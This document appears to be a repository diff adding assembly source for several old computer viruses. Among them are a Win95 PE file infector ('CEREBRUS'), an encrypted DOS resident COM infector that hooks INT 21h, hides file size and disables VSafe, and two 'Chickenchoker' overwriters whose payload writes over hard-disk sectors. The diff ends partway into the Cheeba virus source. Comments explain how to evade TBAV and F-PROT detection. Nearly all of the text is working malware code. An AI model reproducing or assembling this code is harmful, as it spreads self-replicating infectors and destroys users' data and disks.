DD offset FUNC11 - offset PEheader + LoadAT +FindNext DD offset FUNC12 - offset PEheader + LoadAT +CloseFind DD offset FUNC13 - offset PEheader + LoadAT +FileSize DD offset FUNC14 - offset PEheader + LoadAT +WinEx DD offset FUNC15 - offset PEheader + LoadAT + DD 0 +MsgBox: +API_LOC2A DD 
offset FUNCA - offset PEheader + LoadAT + + DD 0 + +DLL1 DB 'KERNEL32.dll',0 +DLLA DB 'USER32',0 + + dw 0 ;ends dll names + +FUNC1 dw 0 + db 'ExitProcess',0 + +FUNC2 dw 0 + DB 'Beep',0 + +FUNC3 dw 0 + DB 'GetCommandLineA',0 + +FUNC4 dw 0 + db 'CreateProcessA',0 + +FUNC5 dw 0 + db 'CopyFileA',0 + +FUNC6 dw 0 + db 'CreateFileA',0 + +FUNC7 dw 0 + db 'SetFilePointer',0 + +FUNC8 dw 0 + db 'ReadFile',0 + +FUNC9 dw 0 + db 'WriteFile',0 + +FUNC10 dw 0 + db 'CloseHandle',0 + +FUNC11 dw 0 + db 'FindFirstFileA',0 + +FUNC12 dw 0 + db 'FindNextFileA',0 + +FUNC13 dw 0 + db 'FindClose',0 + +FUNC14 dw 0 + db 'GetFileSize',0 + +FUNC15 dw 0 + db 'WinExec',0 + + + db 0 ;end of Function list for this DLL + + +FUNCA dw 0 + db 'MessageBoxA',0 + dw 0 + + db 0 ;end the function list + db 0 ;end the DLL list + + +EndIDATA: + +Begin: + + Call Beep + + +;------------------------------------------------------------- + ;this API returns the call with " " so we now move this name only + ;to our buffer excluding the " " and adding the 0 at the end + + call dword ptr [getcomline] + + xchg esi,eax + inc esi + mov edi,offset filename + push edi ;save pointer to the orginal filename + +GetLoop: + lodsb + cmp al,'"' + je AllDone + stosb + jmp GetLoop + +AllDone: + xor eax,eax + stosb + +;get the command line in case we need it + mov edi, offset pCommandLine +GetLine: + lodsb + stosb + cmp al,0 + jne GetLine + +;------------------------------------------------------------- +;Now make the file name into something we can use + pop esi ;pnter to the current file name + push esi + mov Edi,offset tempfile + +TempFile: + lodsb + stosb + cmp al,'.' 
+ jne TempFile + xor eax,eax + ;MOV EAX,004D4F43H ;00'MOC' + mov eax, 00455645h ;00'EVE' + stosd +;------------------------------------------------------------- + pop edi ;the host file + +;-------------------------------------------------------------- +;Copy the file to another name + Call dword ptr [offset Copy] , edi, offset tempfile ,large False + or eax,eax + jz ErrorFile +;-------------------------------------------------------------- +;Open the File r/w using Create file + +Call dword ptr [Create] , offset tempfile, GENERIC_READ or GENERIC_WRITE, \ + large 0, large 0, large OPEN_EXISTING, large 0,large 0 + + mov dword ptr [fHandle],eax + +;-------------------------------------------------------------- +;Move Pointer to the 3ch and fix the pointer to old PE file + Call dword ptr [FileP] , [fHandle], large 3ch, large 0, large 0 + +;for debuggin +; pusha +; mov edi,dword ptr [OldOff] +; call ConvertIt +; Call dword ptr [MsgBox] , large 0, offset tempfile , offset numb +; ,large 1 +; popa +;end for debuggin + + +;-------------------------------------------------------------- +;Write to the file using Write + Call dword ptr [Write], [fHandle],offset OldOff,large 4, \ + offset NumRead, large 0 + +;-------------------------------------------------------------- +;Close the file + Call dword ptr[Close],[fHandle] + +;-------------------------------------------------------------- +;Run the file using CreateProcess + Call dword ptr [createp], \ + offset tempfile, \ ;module name + offset blank, \ ;command line + large 0, \ ;sec attr + large 0, \ ;thread sec + Large False, \ ;inherit handles + large 0, \ ;create flags + large 0, \ ;Enviroment + large 0, \ ;current directory + offset StartupInfo, \ ;startup info + offset ProcessInfo \ ;process info + + +;--------------------------------------------------------------------------- +;Run the file using Winexec +; Call dword ptr [WinEx], offset tempfile, large 1 +; +; Call dword ptr[Close],EAX 
+;--------------------------------------------------------------------------- +;Now try to infect a new file +;1 find file +;2 open the file +;3 make sure its a even 200h boundary alter if needed +;4 modifiy the ptr to raw data in the .Code section +; write the new end to the file +;5 goto top of file then modify 3ch offset to point to the new location +; +;--------------------------------------------------------------- +;1 First find a file + + Call dword ptr [FindFirst], offset NewHost, offset FindData + cmp eax,-1 + je ErrorFile + + mov dword ptr [hfindFile] ,Eax + + jmp GotOne + +CloseFileTry: + Call dword ptr[Close],[fHandle] + +tryfornext: + Call dword ptr [FindNext], [hfindFile], offset FindData + or eax,eax + jnz GotOne + + Call dword ptr[CloseFind],[hfindFile] + jmp ErrorFile + +GotOne: +;--------------------------------------------------------------- +;Open the File r/w using Create file + +Call dword ptr [Create] , offset fName, GENERIC_READ or GENERIC_WRITE, \ + large 0, large 0, large OPEN_EXISTING, large 0,large 0 + + mov dword ptr [fHandle],eax + + cmp eax,-1 + je tryfornext +;--------------------------------------------------------------- +;Get the file size and figure if we need to round it up to a 200h offset +; + call dword ptr [FileSize] , [fHandle],large 0 + cmp eax,-1 + je CloseFileTry + + mov dword ptr[SizeOfFile],eax + dec eax + mov ecx,200h + add eax,ecx + + XOR EDX,EDX + div ecx + mul ecx + mov [CodePtrRwData],eax ;holds the new file size + +;-------------------------------------------------------------- +;Read from the + Call dword ptr [Read] , \ + [fHandle], \ ;handle + offset buffer, \ ;where to read to + 100h, \ ;how much to read + offset NumRead, \ ;how much was read + large 0 ;overlapped amount not used win95 + + or eax,eax + jz CloseFileTry + + + mov ebx,offset buffer + cmp word ptr[ebx],'ZM' + jne CloseFileTry ;Get next file + + + cmp dword ptr [ebx + 3ch],0 + je CloseFileTry + + cmp dword ptr [ebx + 3ch],100h + jg CloseFileTry + + 
mov eax,dword ptr[ebx + 3ch] + mov dword ptr [OldOff],eax + + +;-------------------------------------------------------------- +;Move Pointer to the endf of the file + Call dword ptr [FileP] , [fHandle], large 0, large 0, large 2 + ; file end +;-------------------------------------------------------------- +;Get how many bytes to add to the file + + mov eax,dword ptr [CodePtrRwData] ; holds what the new file size + sub eax,dword ptr [SizeOfFile] + +;-------------------------------------------------------------- +;Write that many bytes to the end of the file +;Write to the file using Write + Call dword ptr [Write], \ + [fHandle], \ ;file handle + offset OldOff, \ ;where to write from + eax, \ ;how many to write + offset NumRead, \ ;how many bytes were writen + large 0 ;overlapped not used in win95 + +;-------------------------------------------------------------- +;Write to the file using Write + Call dword ptr [Write], \ + [fHandle], \ ;file handle + offset PEheader, \ ;where to write from + OFFSET filename - offset PEheader, \ ;how many to write + offset NumRead, \ ;how many bytes were writen + large 0 ;overlapped not used in win95 + + +;-------------------------------------------------------------- +;Move Pointer to the TOPF of the file + Call dword ptr [FileP] , [fHandle], large 3ch, large 0, large 0 +;-------------------------------------------------------------- +;Write the new offset at 3ch + Call dword ptr [Write], \ + [fHandle], \ ;file handle + offset CodePtrRwData, \ ;where to write from + large 4 , \ ;how many to write + offset NumRead, \ ;how many bytes were writen + large 0 ;overlapped not used in win95 + +;-------------------------------------------------------------- +;close the file + Call dword ptr[Close],[fHandle] + +;--------------------------------------------------------------------------- + +;Call dword ptr [MsgBox] , large 0,offset tempfile, offset filename ,large 1 + +ErrorFile: + +K32ExitP: + Call dword ptr ds:[offset API_LOC2 ] ,-1 + + 
+;-------------------------------------------------------- +Beep: + call dword ptr ds:[offset beep ] ,eax,eax + + ret + +;===================================================================== +;ConvertIt takes a number in Edi and Converts it to Readable and Stores it +; in the location Pointed at by Esi +; +;Input +;Edi What number we want to convert to hexdecial readable +;Esi Where it will be placed When Done +; +; + +ConvertIt: + mov esi,offset numb + PushA + + push Edi + xchg Edi,Esi + mov cx,1ch + + +digit_loop: + pop Eax + push Eax + + shr Eax,Cl + and ax,000fh + sub cx,4 + cmp al,9 + jle number + + sub al,0ah + add al,41h + jmp letter + +number: + or al,30h +letter: + stosb + cmp cx,0fffCh + jne digit_loop + mov al,0 + stosb + + pop edi + + + PopA + + Ret +;=================================================================== +MURK DB 'MURKRY/IkX',0 +VIRII DB 'CEREBRUS',0 +info DB 'The three head guardian, is in your computer, fear no more',0 + +numb dd ? + +blank db ' ',0 +OldOff dd 100h + +NewHost db '*.EXE',0 +victim db 'Notepad.exe',0 ;in real virus this would be in the + ;find file info +filename db 256D dup (?) +tempfile db 256D dup (?) +hfindFile dd ? ; +fHandle dd ? +NumRead dd ? +pCommandLine db 256D DUP(?) + +FindData: +fileattr dd ? ; DWORD dwFileAttributes; ;00 00 00 00 +fCreat dd 2 dup(?) ; FILETIME ftCreationTime; ;DD ?,? ; +fAccess dd 2 dup(?) ; FILETIME ftLastAccessTime; ;DD ?,? ; +fWrite dd 2 dup(?) ; FILETIME ftLastWriteTime; ;DD ?,? ; +fsizelow dd ? ; DWORD nFileSizeHigh; ; +fsizehigh dd ? ; DWORD nFileSizeLow; ; +fresv1 dd ? ; DWORD dwReserved0; ; +fresv2 dd ? ; DWORD dwReserved1; ; +fName db 255d dup(?) ; CHAR cFileName[MAX_PATH]; 255B ; +fdosname db 14d dup(?) ; CHAR cAlternateFileName[ 14 ]; ; + +SizeOfFile dw ? +FleHdle dd ? +ProcessInfo dd 4h dup(?) +StartupInfo dd 18h dup(?) +buffer db ? 
+ + +;------------- +ttle db 'Hello',0 +msg db 'from host',0 + +CodeEnds: + + + Call MessageBoxA, large 0, offset ttle, offset msg, large 1 + push -1 + Call ExitProcess + end CodeEnds + + +;哪腫1.INC]哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 + +;1.inc +PEheader db 'PE',0,0 ;200 +Machine dw 014ch +NumSect dw 0002h ;Seems Win95 does check this but if + ; there is a Section Header entry + ; it will load that section or as + ; many sections as there are entries + ; in other words it loads till + ; the next section header is 0000h + ; or it has load the NumSect + +TimeDate dd 6f052098h +PtrSymTble dd 00000000h +Numsymbols dd 00000000h +SizeOpHder dw 00e0h +Char dw 818eh + +Magic dw 010bh +LinkerVer dw 1902h +SiZeOfCOde dd offset CodeEnds - offset PEheader + +SizeOfInitData dd 00003000h +SizeOfUnintdata dd 000000000 + +EntryPoint dd offset Begin - offset PEheader + LoadAT +BaseCode dd 00400000h +BaseData dd 00400000h + +ImageBase dd 00400000h +SectionAlign dd 00001000h +FileAlign dd 00000200h + +OsMajor dw 0001h +Osminor dw 0000h +UseMajor dw 0000h +UseMinor dw 0000h +SubSysMajor dw 0003h +SubSysMinor dw 000Ah + dw 0000h + dw 0 +ImageSize dd 00010000h +HeaderSize dd offset CDseg - offset PEheader +FileCheck dd 0h ;checksum +Subsystem dw 0002h +DllFlag dw 0000h +StackRes dd 00100000h +StackComm dd 00002000h ;60 +HeapRes dd 00100000h +Heapcomm dd 00001000h +LoaderFlag dd 00000000h + +NumberRVA dd 00000010h ;:-D he he he! +; +CODE SEGMENT + + .286c + ASSUME CS:CODE, DS:CODE, ES:CODE + ORG 100h + +START: + JMP COMIENZO + NOP + NOP + NOP + INT 20h + +COMIENZO: +ONE LABEL BYTE + INT 03h ; This piece o'shit's for TBAV :( ::: + MOV BX,0107h + PUSH BX + MOV AH,0Dh ; ??? What?????????! 
+ MOV CX,(OFFSET INCRIPT - OFFSET ONE) - (OFFSET DESDE_ACA - OFFSET ONE) + MOV SI,(OFFSET DESDE_ACA - OFFSET ONE) + ADD SI,BX +DESENCRIPTO: + MOV DL,CS:[((NUMERO - OFFSET ONE) + BX)] + XOR [SI],DL + INC SI + XOR AH,AH ; This shit's for F-PROT + INT 02h ; This shit's for TBAV + LOOP DESENCRIPTO + + JMP DESDE_ACA + INT 21h + + MOV AX,4C00h + INT 21h + +DESDE_ACA: + MOV AX,0CACAh + INT 21h + CMP AX,0FEDEh + JE CORRE_PROG_1 + JMP CHUPAMELA +CORRE_PROG_1: + JMP CORRE_PROG + +CHUPAMELA: + PUSH AX + PUSH DX + MOV AX,0FA01h + MOV DX,5945h + INT 21h + POP DX + POP AX + + MOV AH,4Ah + XOR BX,BX + INT 21h + + MOV AH,4Ah + MOV BX,0FFFFh + INT 21h + + SUB BX,101h + MOV AH,4Ah + INT 21h + + MOV AH,48h + MOV BX,100h + INT 21h + + MOV ES,AX + PUSH ES + DEC AX + MOV ES,AX + MOV ES:WORD PTR [0001h], 0008h + POP ES + + PUSH CS + POP DS + + POP SI + PUSH SI + XOR DI,DI + MOV CX,OFFSET TWO - OFFSET ONE + CLD + REP MOVSB + + PUSH ES + POP DS + + MOV AX,3521h + INT 21h + POP SI + PUSH SI + MOV DS:[INT21IP - OFFSET ONE],BX + MOV DS:[INT21CS - OFFSET ONE],ES + + MOV AX,2521h + MOV DX,(OFFSET HOOK_21 - OFFSET ONE) + INT 21h + + MOV AH,04h + INT 1Ah + CMP DX,0526h + JE JODE_2 + CMP DX,1126h + JE JODE_2 + CMP DX,1021h + JE JODE_2 + JMP NO_JODE +JODE_2: + MOV AX,3513h + INT 21h + MOV DS:[INT17IP - OFFSET ONE],BX + MOV DS:[INT17CS - OFFSET ONE],ES + + MOV AX,2513h + MOV DX,(OFFSET HOOK_13 - OFFSET ONE) + INT 21h +NO_JODE: + PUSH CS + PUSH CS + POP DS + POP ES + +CORRE_PROG: + POP BX + + MOV DI,100h + LEA SI,[(NORMAL - OFFSET ONE) + BX] + MOVSW + MOVSB + + PUSH CS + PUSH 0100h + RETF + +HOOK_21 PROC FAR + PUSH DS + PUSHF + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH SI + PUSH DI + PUSH DS + PUSH ES + + CMP AX,0CACAh + JE RESIDE + CMP AH,4Bh + JE INFECTA1 + CMP AH,3Dh + JE INFECT_FAST1 + CMP AH,4Eh + JE NO_NC + CMP AH,4Fh + JE NO_NC + CMP AH, 11h + JE NO_DIR + CMP AH, 12h + JE NO_DIR + JMP FIN + +INFECTA1: JMP INFECTA +INFECT_FAST1: JMP INFECT_FAST +RESIDE: + POP ES + POP DS + POP DI + POP SI + 
POP DX + POP CX + POP BX + POP AX + + POPF + POP DS + MOV AX,0FEDEh + IRET + +NO_DIR PROC + POP ES + POP DS + POP DI + POP SI + POP DX + POP CX + POP BX + POP AX + POPF + POP DS + + PUSH CX + PUSH BX + PUSH ES + + PUSH AX + MOV AH,2Fh + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + POP AX + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + PUSH AX + PUSHF + OR AL,AL + JNE FINHANDLER2 + CMP BYTE PTR ES:[BX],0FFh + JNE NOEXTENDED + ADD BX,07h + +NOEXTENDED: + MOV CX,ES:[BX+17h] + AND CL,00011111b + CMP CL,00001101b + JNE FINHANDLER2 + SUB WORD PTR ES:[BX+1Dh],OFFSET TWO - OFFSET ONE ;LE RESTO EL VALOR DEL PRG + SBB WORD PTR ES:[BX+1Fh],0 +FINHANDLER2: + POPF + POP AX + POP ES + POP BX + POP CX + RETF 0002h +NO_DIR ENDP + +NO_NC PROC + POP ES + POP DS + POP DI + POP SI + POP DX + POP CX + POP BX + POP AX + POPF + POP DS + + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + PUSHF + PUSH AX + PUSH BX + PUSH CX + PUSH ES + + MOV AH,2Fh + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + + MOV CX,ES:[BX+16h] + AND CL,00011111b + CMP CL,00001101b + JE SI_RECUBRO + JMP NO_RECUBRO + +SI_RECUBRO: + SUB WORD PTR ES:[BX+1Ah],OFFSET TWO - OFFSET ONE ;LE RESTO EL VALOR DEL PRG + +NO_RECUBRO: + POP ES + POP CX + POP BX + POP AX + POPF + RETF 2 +NO_NC ENDP + +FIN_1: JMP FIN + +INFECT_FAST: + MOV SI,DX +BUCLE: + CMP BYTE PTR [SI],"." 
+ JE YASTA + CMP BYTE PTR [SI],00h + JE FIN_1 + INC SI + JMP BUCLE +YASTA: + PUSH SI +BUCLE2: + CMP BYTE PTR [SI],"\" + JE YASTA2 + CMP SI,DX + JNE NOSTA2 + DEC SI + JMP YASTA2 +NOSTA2: + DEC SI + JMP BUCLE2 +YASTA2: + INC SI + MOV AX,[SI] + OR AX,2020h + CMP AX,"oc" + JNE DALEPUES + INC SI + INC SI + MOV AX,[SI] + OR AX,2020h + CMP AX,"mm" + JNE DALEPUES + POP SI + JMP FIN_1 + +DALEPUES: + POP SI + INC SI + MOV AX,[SI] + OR AX,2020h + CMP AX,"oc" + JNE FIN_1 + +INFECTA: + PUSH AX + PUSH BX + PUSH DX + PUSH DS + PUSH ES + + MOV AX, CS + MOV DS, AX + MOV AX,3524h + PUSHF + CALL DWORD PTR DS:[INT21IP - OFFSET ONE] + MOV DS:[INT24IP - OFFSET ONE],BX + MOV DS:[INT24CS - OFFSET ONE],ES + + MOV AX,2524h + MOV DX,(OFFSET HOOK_24 - OFFSET ONE) + PUSHF + CALL DWORD PTR DS:[INT21IP - OFFSET ONE] + POP ES + POP DS + POP DX + POP BX + POP AX + + PUSH DX + PUSH DX + + CALL REMUEVE_BITS + + POP DX + MOV AX,4300h + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + MOV CS:[(ATRIBUTOS - OFFSET ONE)],CX + + MOV AX,4301h + MOV CX,20h + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + JC FINAL_1 + + MOV AX,3D02h + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + PUSH AX + POP BX + + MOV AH,3Fh + MOV CX,2 + PUSH CS + POP DS + MOV DX,(OFFSET NORMAL - OFFSET ONE) + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + + XOR SI,SI + MOV AL,CS:(NORMAL - OFFSET ONE)[SI] + CMP AL,'M' + JE FINAL_1 + INC SI + MOV AL,CS:(NORMAL - OFFSET ONE)[SI] + CMP AL,'Z' + JE FINAL_1 + JMP CONTI +FINAL_1: + JMP FINAL + +CONTI: + MOV AX,5700h + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + MOV CS:[(HORA - OFFSET ONE)],CX + MOV CS:[(FECHA - OFFSET ONE)],DX + + AND CL,00011111b ; Esto es lo correcto para comprobar + CMP CL,00001101b ; si los segundos son 26 + JE FINAL_1 + + MOV AX,4200h + CWD + MOV CX,DX + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + + MOV AH,3Fh + MOV CX,3 + PUSH CS + POP DS + MOV DX,(OFFSET NORMAL - OFFSET ONE) + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + + MOV AX,4202h 
+ CWD + MOV CX,DX + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + PUSH AX + + SUB AX,3 + + MOV SI,1 + MOV CS:(BUFFER - OFFSET ONE)[SI],AL + INC SI + MOV CS:(BUFFER - OFFSET ONE)[SI],AH + +; PUSH AX ;MIERDA1 + + MOV AH,2Ch + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + MOV CS:[NUMERO - OFFSET ONE],DL + + PUSH BX + MOV AH,48h + MOV BX,150h + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + MOV ES,AX + POP BX + + PUSH CS + POP DS + + XOR SI,SI + MOV DI,SI + MOV CX,OFFSET TWO - OFFSET ONE + CLD + REP MOVSB + + PUSH ES + POP DS + + POP AX ;LL + INC AH + XOR SI,SI ;LL + MOV ES:[SI + 2],AL ;OPA + MOV ES:[SI + 3],AH + + MOV CX,(OFFSET INCRIPT - OFFSET ONE) - (OFFSET DESDE_ACA - OFFSET ONE) + MOV SI,(OFFSET DESDE_ACA - OFFSET ONE) +ENCRIPTO: + XOR [SI],DL + INC SI + LOOP ENCRIPTO + + MOV AH,40h + MOV CX,OFFSET TWO - OFFSET ONE + XOR DX,DX + PUSH ES + POP DS + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + JC FINAL + + MOV AH,49h + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + + MOV AX,4200h + CWD + MOV CX,DX + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + + MOV AH,40h + MOV CX,3 + MOV DX,(OFFSET BUFFER - OFFSET ONE) + PUSH CS + POP DS + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + + MOV AX,5701h + MOV CX,CS:[(HORA - OFFSET ONE)] + AND CL,11100000b + OR CL,00001101b + MOV DX,CS:[(FECHA - OFFSET ONE)] + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] +FINAL: + MOV AH,3Eh + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + + MOV AX,4301h + MOV CX,CS:[(ATRIBUTOS - OFFSET ONE)] + POP DX + PUSHF + CALL DWORD PTR CS:[INT21IP - OFFSET ONE] + + CALL RESTAURA_BITS + + MOV AX,2524h + MOV DX,CS:[INT24IP - OFFSET ONE] + MOV DS,CS:[INT24CS - OFFSET ONE] + PUSHF + CALL DWORD PTR CS:[INT21IP-OFFSET ONE] + +FIN: + POP ES + POP DS + POP DI + POP SI + POP DX + POP CX + POP BX + POP AX + + POPF + POP DS + JMP DWORD PTR CS:[(INT21IP - OFFSET ONE)] +HOOK_21 ENDP + +HOOK_13 PROC + PUSHF + PUSH AX + PUSH BX + PUSH CX + PUSH SI + XOR BX,BX + MOV SI,31 + MOV CX,75 
+ESCRIBE:
+ MOV AH,0Eh
+ MOV AL,CS:(TEXTO - OFFSET ONE)[SI]
+ INT 10h
+ INC SI
+ LOOP ESCRIBE
+ POP SI
+ POP CX
+ POP BX
+ POP AX
+ POPF
+ JMP DWORD PTR CS:[(INT17IP - OFFSET ONE)]
+HOOK_13 ENDP
+
+HOOK_24 PROC
+ XOR AL,AL
+ IRET
+HOOK_24 ENDP
+
+V_SAFE PROC
+ MOV AH,0FAh
+ MOV DX,5945h
+ INT 21h
+ RET
+V_SAFE ENDP
+
+VERIFICA_RESIDENCIA PROC
+ XOR AL,AL
+ CALL V_SAFE
+ CMP BX,2F00h
+ JE FORI
+ STC
+FORI: RET
+VERIFICA_RESIDENCIA ENDP
+
+REMUEVE_BITS PROC
+ CALL VERIFICA_RESIDENCIA
+ JC FORI_1
+ MOV AL,02h
+ MOV BL,00000000b
+ CALL V_SAFE
+ MOV CS:[SEBA-OFFSET ONE],CL
+FORI_1:
+ CLC
+ RET
+REMUEVE_BITS ENDP
+
+RESTAURA_BITS PROC
+ CALL VERIFICA_RESIDENCIA
+ JC FORI_2
+ MOV AL,02
+ MOV BL,CS:[SEBA-OFFSET ONE]
+ CALL V_SAFE
+FORI_2:
+ CLC
+ RET
+RESTAURA_BITS ENDP
+
+INT21IP DW 0
+INT21CS DW 0
+INT24IP DW 0
+INT24CS DW 0
+INT17IP DW 0
+INT17CS DW 0
+ATRIBUTOS DW 0
+SEBA DB 1
+HORA DW 0
+FECHA DW 0
+BUFFER DB 3 DUP(0E9h)
+NORMAL DB 3 DUP(90h)
+TEXTO DB "VIRUS LOS SALIERIS DE CHARLY 2."
+ DB "AIN'T A HACKER,"
+ DB "AIN'T A CRACKER,"
+ DB "I AM ONLY A MOTHERFUCKER."
+ DB 'DEDICATED TO "MACA"'
+INCRIPT LABEL BYTE
+NUMERO DB 1 DUP(0)
+
+TWO LABEL BYTE
+
+CODE ENDS
+END START
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.chc.asm b/MSDOS/Virus.MSDOS.Unknown.chc.asm
new file mode 100644
index 00000000..d40abeaa
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.chc.asm
@@ -0,0 +1,87 @@
+; Chickenchoker Virus by HDKiller
+;
+; Origianl Variant 127 bytes
+; Fixored up Variant 132 bytes
+;
+;
+; This is a trivial variant of a basic sort, no encryption and a nasty payload
+;
+; Being HDKiller's first virus it wasnt a bad start, though I wouldnt have made
+; it destructive.
+;
+; The original version of this virus raised 2 flags in TBAV FS, one for file
+; access and one for com/exe search routine. The S is defeated by changing the
+; original *.com with a *.?om wich is functionally the same but will cause the
+; the virus to attack .aom .bom .com etc... This makes the virus a little more
+; unstable, bet hey it's trivial. The F is caused by mov ah,40h and can be
+; beaten any number of ways, I used a mov ah,00h then an xor ah, 40h. Thats
+; one of countless numbers of way to get 40h into ah. TBAV was keying on the
+; beginning of this virus to get it's determination that it's a trivial virus.
+; By adding a few lines of code you effectively loose TBAV.
+;
+Code Segment
+ Assume CS:code,DS:code
+ Org 100h
+
+startvx proc near
+
+ mov ah,4eh
+; mov cx,0000h ; Key point for TBAV
+ mov cx,0013h
+lopht: ; Quick and simple loop to confuse TBAV
+ loop lopht ; Now that didnt take much did it ??
+ mov dx,offset star_com
+ int 21h
+
+ mov ah,3dh
+ mov al,02h
+ mov dx,9eh
+ int 21h
+
+ xchg bx,ax
+
+; mov ah,40h ; Sets off the F in TBAV
+ xor ah,ah ; One of many methods to get 40h into
+ xor ah,40h ; ah.
Be imaginative when you can :)
+ mov cx,offset endvx - offset startvx
+ mov dx,offset startvx
+ int 21h
+
+ mov ah,3eh
+ int 21h
+
+ int 20h
+
+szTitleName db' Chickenchoker Virus by hdkiller has been activated'
+;szTitleName db' ChChickenchchoker Virus by hdkiller | SOK-3'
+
+rip_hd:
+
+ xor dx,dx
+rip_hd1:
+ mov cx,2
+ mov ax,311h
+ mov dl,80h
+ mov bx,5000h
+ mov es,bx
+ int 13h
+ jae rip_hd2
+ xor ah,ah
+ int 13h
+ rip_hd2:
+ inc dh
+ cmp dh,4
+ jb rip_hd1
+ inc ch
+ jmp rip_hd
+
+startvx endp
+
+;star_com: db "*.com",0 ; Sets off S in TBAV
+star_com: db "*.?om",0 ; Sacrifice a little stability to loose
+ ; the S flag
+
+endvx label near
+
+code ends
+ end startvx
diff --git a/MSDOS/Virus.MSDOS.Unknown.chchoke.asm b/MSDOS/Virus.MSDOS.Unknown.chchoke.asm
new file mode 100644
index 00000000..ac326e50
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.chchoke.asm
@@ -0,0 +1,58 @@
+Code Segment
+ Assume CS:code,DS:code
+ Org 100h
+
+startvx proc near
+
+ mov ah,4eh
+ mov cx,0000h
+ mov dx,offset star_com
+ int 21h
+
+ mov ah,3dh
+ mov al,02h
+ mov dx,9eh
+ int 21h
+
+ xchg bx,ax
+
+ mov ah,40h
+ mov cx,offset endvx - offset startvx
+ mov dx,offset startvx
+ int 21h
+
+ mov ah,3eh
+ int 21h
+
+ int 20h
+
+szTitleName db' Chickenchoker Virus by hdkiller has been activated'
+
+rip_hd:
+
+ xor dx,dx
+rip_hd1:
+ mov cx,2
+ mov ax,311h
+ mov dl,80h
+ mov bx,5000h
+ mov es,bx
+ int 13h
+ jae rip_hd2
+ xor ah,ah
+ int 13h
+ rip_hd2:
+ inc dh
+ cmp dh,4
+ jb rip_hd1
+ inc ch
+ jmp rip_hd
+
+startvx endp
+
+star_com: db "*.com",0
+
+endvx label near
+
+code ends
+ end startvx
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.cheeba.asm b/MSDOS/Virus.MSDOS.Unknown.cheeba.asm
new file mode 100644
index 00000000..d2f9bf8d
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.cheeba.asm
@@ -0,0 +1,857 @@
+;****************************************************************************;
+; ;
+; -=][][][][][][][][][][][][][][][=- ;
+; -=] P E R F E C T C R I M E [=- ;
+; -=] +31.(o)79.426o79 [=- ;
+; -=] [=- ;
+; -=] For All Your H/P/A/V Files [=- ;
+; -=] SysOp: Peter Venkman [=- ;
+; -=] [=- ;
+; -=] +31.(o)79.426o79 [=- ;
+; -=] P E R F E C T C R I M E [=- ;
+; -=][][][][][][][][][][][][][][][=- ;
+; ;
+; *** NOT FOR GENERAL DISTRIBUTION *** ;
+; ;
+; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
+; Around Among the General Public. It Will be Very Useful for Learning how ;
+; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
+; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
+; Experience can Turn it Into a far More Malevolent Program Than it Already ;
+; Is. Keep This Code in Responsible Hands! ;
+; ;
+;****************************************************************************;
+;*** The author of Cheeba let his source lie around --- so HERE IT IS!!! ***
+; Btw just one thing --- I give it 2 you as long as you don't make a
+; sucking destroying thing... Btw 2 this is of course only educational...
+;-----------------------------------------------------------------------------
+; Naam en password staan +- op lijn 200. Verander de low-version number
+; bij de verschillende versies...
+; Verander verder NIKS aan het virus !!!
+
+Com_First: push cs
+S_1: mov ax,100h
+S_2: push ax
+ mov ax,cs
+CodePars: add ax,0
+ push ax
+S_3: mov ax,offset End_Virus
+S_4: push ax
+ retf
+
+VirTitle db 'CHEEBA Makes Ya High Harmlessly-1.2 F**K THE LAMERS'
+
+I21Hooks db 0
+ dw offset Stop_Prg
+ db 31h
+ dw offset Stop_Prg
+ db 4Ch
+ dw offset Stop_Prg
+ db 4Bh
+ dw offset Start_Prg
+ db 45h
+ dw offset Check_Init
+ db 3Ch
+ dw offset Open_Wrt
+ db 3Dh
+ dw offset Open_Rd
+ db 3Eh
+ dw offset Check_Close
+ db 40h
+ dw offset Check_Vir
+
+New_21: call Rest_Orig_21
+ call Save_Regs
+ cld
+ mov bx,offset I21Hooks
+Srch_Fct_Lp: cmp ah,[bx]
+ jne Wrong_Fct
+ push [bx+1]
+ call Retr_Regs
+ ret
+Wrong_Fct: add bx,3
+ cmp bx,offset New_21
+ jb Srch_Fct_Lp
+
+Go_Dos: call Retr_Regs
+ call Call_Dos
+Skip_21: call Rest_21_Jmp
+ retf 2
+
+Call_Dos: pushf
+ db 09Ah
+Org_21_Addr dw 2 dup (?)
+ ret
+
+Org_21_Code db 5 dup (?)
+
+;*** Fct 45 - check init ***
+
+Check_Init: cmp bx,0D15h
+ jne Go_Dos
+ mov bx,0F0Ch
+ jmp short Skip_21
+
+;*** I21 FCT 3Dh - Open file for read ***
+
+Open_Rd: test al,3
+ jz Go_Dos
+ xchg si,dx
+Get_0: lodsb
+ or al,al
